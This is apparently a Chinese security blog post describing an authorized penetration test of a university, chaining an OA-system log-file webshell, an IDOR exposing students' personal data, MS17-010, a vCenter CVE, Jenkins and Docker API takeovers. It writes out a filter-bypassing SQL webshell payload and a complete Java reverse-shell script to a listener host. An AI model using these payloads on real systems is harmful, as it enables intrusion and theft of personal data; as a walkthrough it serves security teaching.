【渗透实战】记一次授权渗透测试
2023-6-7 13:48:45 Author: moonsec(查看原文) 阅读量:38 收藏

免责声明:本公众号所提供的文字和信息仅供学习和研究使用,不得用于任何非法用途。我们强烈谴责任何非法活动,并严格遵守法律法规。读者应该自觉遵守法律法规,不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任

最近暗月弄了数个安全圈交流的群 欢迎前来加入 有需要好友添加微信发送 进群

TDOA

1.拿到目标站点,是一个高校,Googlehacking找到一些学号以及教务系统。

2.随便点击一个链接,来到登录界面。


3.URL中有OAServices,这难道是个OA系统,于是fofa一手。

4.TD,嗯...梭哈是一种智慧,跑出管理员cookie。

5. 2016版的,历史漏洞挺多,找到数据库管理功能尝试通过写日志shell。


6.桌面随便新建个.sql文件进行上传,然后burp抓包开搞,先开启日志,set、select什么的都有过滤,但是能大小写绕过。


7. 设置日志路径。

8.ok,写shell,嗯...又有过滤,过滤了<?php和一些函数,能怎么办,绕呗,<?php这里php是可以去掉的,然后函数就用注释符来干扰。

9.写入成功,记得把日志停了。

Set global general_log=on;#开启记录日志

SET global general_log_file='D:/MYOA/webroot/xxx.php';#指定日志文件路径

SELECT '<? file_put_contents/**/(/**/$_SERVER/**/[/**/"DOCUMENT_ROOT"/**/]/**/./**/"//update.php"/**/,/**/base64_decode/**/(/**/"Base64编码后的哥斯拉马"/**/)/**/)/**/;/**/?><? /**/unlink/**/(/**/__FILE__/**/)/**/;/**/?>';#有过滤,使用/**/注释符进行绕过

Set global general_log=off;#关闭日志记录

10.访问一下xxx.php,然后会将哥斯拉马写入到当前目录的update.php中,哥斯拉上线。


11.system权限,非常棒。


12.tasklist /SVC查杀软,有MSE,嗯...人太菜了,不会写免杀,只能站在巨人的肩上。


13.直接dddd。


14.用哥斯拉上传执行,然后cs成功上线。

15.TDOA的话,数据库配置文件是在D:/MYOA/webroot/inc/oa_config,打开查看。

16.找到一些姓名 等信息,厚码。

未授权

1. 用之前收集到的学号尝试登录教务系统,抓包测试后发现验证码可复用,直接开爆,登录之后发现有个在校证明。

2.嗯哼,姓名、学院、sfz这些都有。

3.还有个二维码 扫下看看,哟,这xh字段不就是学号吗,还是明文。

4.将刚才登录的账号注销掉。

5.访问链接,修改学号,成功返回其他人信息。

MS17-010

1.搭建好隧道后,fscan开扫,发现一堆17010,msf直接开打。



2.扫描到的跟着往下打,梭哈的快乐。

Vmware Vcenter Unauthorized(CVE-2021-21972)

扫到一个CVE

[+] https://x.x.x.x/ware-vcenter-unauthorized-rce-cve-2021-21972

直接用exp:https://github.com/NS-Sp4ce/CVE-2021-21972

等待写入后 冰蝎连接

是真的菜,提权没成功。

Jenkins Unauthorized Rce

1.有个Jenkins

2.在系统管理->脚本命令行,可以命令执行。

3.直接反弹shell。

String host="x.x.x.x";
int port=1333;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

4.监听上线。

Docker Api Unauthorized Rce

1.还有一堆的Docker Api Unauthorized,直接开搞。


2. docker拉取一个镜像。

3.使用拉取的镜像启动一个新的容器,以sh或者/bin/bash作为shell启动,并且将该宿主机的根目录挂在到容器的/mnt目录下。


4.进入/mnt目录下即可逃逸到宿主机

5.写任务计划反弹shell

6.监听,等一分钟左右,上线。

总结

还有一堆ssh、mysql等弱口令以及Memcached unauthorized、Mongodb unauthorized这些,就不写了,整理整理交报告了。

关注公众号

公众号长期更新安全类文章,关注公众号,以便下次轻松查阅

觉得文章对你有帮助 请转发 点赞 收藏


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMjc0NTEzMw==&mid=2653587448&idx=1&sn=116458f80868a6ffbc2550d6a108ab28&chksm=811b91bab66c18ac7346614b98228deca6e58f24771b9879bc192d274602bdc700dec8d6d802#rd
如有侵权请联系:admin#unsafe.sh